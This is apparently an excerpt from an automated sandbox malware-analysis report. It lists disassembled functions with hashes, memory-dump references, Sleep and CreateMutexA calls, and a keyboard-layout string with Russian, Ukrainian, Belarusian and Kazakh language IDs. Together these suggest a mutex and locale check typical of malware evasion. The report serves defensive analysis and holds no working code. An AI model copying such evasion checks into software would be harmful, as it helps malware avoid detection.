Instruction Fuzzy Hash: 8C11A3EB24C115BE6142A4865B509FA7A6EE7D3770730803AF407C6A22FAD59DCB3271

Function 009D5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Keyboard Layout\Preload, xrefs: 009D6054
00000422, xrefs: 009D60C9
0000043f, xrefs: 009D612B
00000423, xrefs: 009D60FA
00000419, xrefs: 009D6098

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 6257db60589f14b6e1fc0be9094bccd3da7a62ca7823f249b1d449d6c84c2e13
Instruction ID: 8db494512a31525c478d13b859dbbaa59230ad4b9de7a3c4f067d4fa3b410b03
Opcode Fuzzy Hash: 6257db60589f14b6e1fc0be9094bccd3da7a62ca7823f249b1d449d6c84c2e13
Instruction Fuzzy Hash: D1F1C170900258ABEB24DF54CC85BDEBBB9EB44304F5086A9F518A73C1DB74AE84CF94

Function 009D9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2bfd9e985cb20c0caf3f8b73250868ee7dcd73b9409545be60b822768c6eb6cd
Instruction ID: aad5002cea22f135678723285802a8f91438580749fa0cb1407c8837e87a8ae9
Opcode Fuzzy Hash: 2bfd9e985cb20c0caf3f8b73250868ee7dcd73b9409545be60b822768c6eb6cd
Instruction Fuzzy Hash: 5F315B316452049BFB08EBB8DC8975DB766EBD2314F20C21AE0149B3D5C77999918752

Function 009D9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9d2961bd0ce176d92726d7aedc349138a2c154dd52f0e8953c2c5e114739d2c6
Instruction ID: 59226aace503f3e1409ac99f607de3f7ce061f5d1982e881dd02986471e1e3a1
Opcode Fuzzy Hash: 9d2961bd0ce176d92726d7aedc349138a2c154dd52f0e8953c2c5e114739d2c6
Instruction Fuzzy Hash: 463122316852049BEB08EBBCDC987ADB766EBC6314F20861AF414EB3D1C7369D908752

Function 009DA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2595772c0168ae81753b72d1064c307bc2ba3630ff7417d4202e73eea6779d62
Instruction ID: f4202c753cf952c9070aa72f05d63563bcdf819666dfb752ef104950ea36b12f
Opcode Fuzzy Hash: 2595772c0168ae81753b72d1064c307bc2ba3630ff7417d4202e73eea6779d62
Instruction Fuzzy Hash: 4D317B317852009BFB08DBB8CC8476DB776DBC2314F24C61AE0149B3D1C736A9A08757

Function 009DA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0d131299a30d71b6e967c303074d1241de0f0506c9e4c56b87be32b984c39656
Instruction ID: 65faba0f47478afd8e581074f6e27794f919801b6ff881cba28ee76725ef3dfe
Opcode Fuzzy Hash: 0d131299a30d71b6e967c303074d1241de0f0506c9e4c56b87be32b984c39656
Instruction Fuzzy Hash: 81317B316852419BFB08DFB8DCC875DB766EBC6310F20C61AE014AB3D1C73AA9A08752

Function 009DA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

